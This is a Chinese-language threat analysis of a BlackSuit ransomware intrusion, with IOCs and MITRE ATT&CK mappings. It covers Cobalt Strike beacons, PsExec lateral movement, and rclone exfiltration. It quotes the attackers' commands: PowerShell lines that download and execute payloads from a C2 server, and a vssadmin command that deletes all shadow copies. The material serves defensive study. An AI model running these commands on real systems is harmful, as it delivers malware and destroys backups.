BlackSuit勒索软件：结合数据窃取与加密的混合攻击

关键要点

近期观察到的BlackSuit勒索软件攻击展示了独特的战术、技术和程序(TTPs)
BlackSuit是2023年中出现的勒索软件组织，被认为是Royal勒索软件的重命名或分支
攻击中主要使用Cobalt Strike作为主要攻击工具，结合rclone、RDP、PsExec、vssadmin等工具
与传统勒索软件不同，BlackSuit会先窃取和删除部分目标数据，再进行文件加密
使用-nomutex标志允许多个实例同时运行

技术分析

攻击流程分解

BlackSuit勒索软件组织在攻击中利用Cobalt Strike信标进行横向移动和C2连接，并使用BlackSuit勒索软件加密数据。

横向移动

使用PsExec.exe 观察到使用PsExec.exe执行远程命令，尝试将Cobalt Strike信标vm.dll和vm80.dll复制到环境中其他机器的(C:\Windows\Temp)文件夹中。

使用远程过程调用(RPC)和其他Windows功能 在受影响设备上执行Configure-SMRemoting.exe，允许远程控制。使用系统权限通过RPC创建远程服务。

命令与控制(C2)

Cobalt Strike信标下载 观察到使用PowerShell命令连接到C2 IP地址下载文件并保存为vm.dll和vm80.dll。

执行的PowerShell命令：

1
2


"PowerShell.exe" invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll
"PowerShell.exe" invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm80.dll

恶意负载下载 从PsExec.exe发起，执行PowerShell命令连接到受感染的内部IP地址，下载恶意负载并重命名为b.exe。

1

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -command "(new-object net.webclient).downloadfile('http://10.1.xxx.xxx:8088/yyy.exe', 'c:\programdata\b.exe'); c:\programdata\b.exe -id LE2OYvCXLI2PIN66LmldgMRLBbcXWb1U -nomutex"

-nomutex标志禁用互斥体创建，表明战术可能发生变化，允许多个并发执行。

影响

LSASS凭据访问和转储

Cobalt Strike工具本身已知利用Mimikatz或CreBandit等工具进行各种凭据转储行为。

数据窃取

观察到rclone.exe被重命名为vmware.exe并在事件中使用。从网络共享文件夹执行，a2e6ee5.exe生成rundll32.exe、cmd.exe，并执行vmware.exe/rclone.exe连接到多个C2域和IP地址。这被认为是攻击的数据窃取部分，观察到大约60 GB的数据在传输中。

通过vssadmin.exe删除数据

观察到PowerShell下载恶意负载yyy.exe并将其重命名为b.exe。执行b.exe并进行网络扫描，导致vssadmin.exe删除文件影子副本。

使用的确切PowerShell命令：

1

Vssadmin.exe /c vssadmin delete shadows /all /quiet

文件枚举和加密逻辑

备份删除后，BlackSuit勒索软件设置其排除路径（免于文件加密的文件或目录）。以下文件扩展名被排除在加密之外：

.BlackSuit
.exe
.dll

然后避免加密关键系统目录和网络共享，可能是为了降低破坏系统功能的风险：

“Windows”（防止加密系统文件）
“IPC$"（避免破坏IPC机制）
“ADMIN$"（防止管理共享问题）

数据加密和留下勒索笔记

BlackSuit勒索软件以其数据加密和数据删除的双重方法而闻名，与仅专注于数据删除的传统勒索软件恶意软件相比。这种部分加密方法允许威胁行为者决定要加密的特定百分比数据，这有助于逃避检测并显著提高勒索软件速度。

结论

这次BlackSuit勒索软件攻击展示了一个复杂多阶段的操作，旨在破坏目标系统、窃取敏感数据和加密关键文件。

在数据窃取阶段，攻击者利用重命名版本的合法rclone实用程序将敏感文件秘密传输到远程位置，从而破坏机密性。这一步骤突显了攻击者将恶意活动与合法流程混合的能力，使检测更具挑战性。

这次攻击强调了强大安全措施的重要性，包括网络分段和警惕滥用合法工具用于恶意目的。全面的安全策略对于预防和减轻此类高级威胁的影响至关重要。

威胁指标(IOC)

类型	描述
d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b	Vm80.dll Cobalt Strike信标
69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03	Vm.dll Cobalt Strike信标
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298	rclone.exe伪装为vmware.exe
180[.]131[.]145[.]85	C2 IP地址
184.174.96[.]71	C2 IP地址
misstallion[.]com	C2域

攻击战术与技术

战术	技术	摘要
TA0002-执行	T1059-命令和脚本解释器：PowerShell	PowerShell下载Cobalt Strike信标和其他恶意负载
TA0008-横向移动	T1021.002：远程服务：SMB/Windows管理共享	从psexec.exe进行横向移动
TA0010-渗出	T1567.002：通过Web服务渗出：渗出到云存储	通过rclone.exe进行数据渗出
TA0040-影响	T1490-抑制系统恢复	删除卷影副本(vssadmin.exe)以防止恢复
TA0040-影响	T1486-数据加密影响	BlackSuit勒索软件负载进行数据加密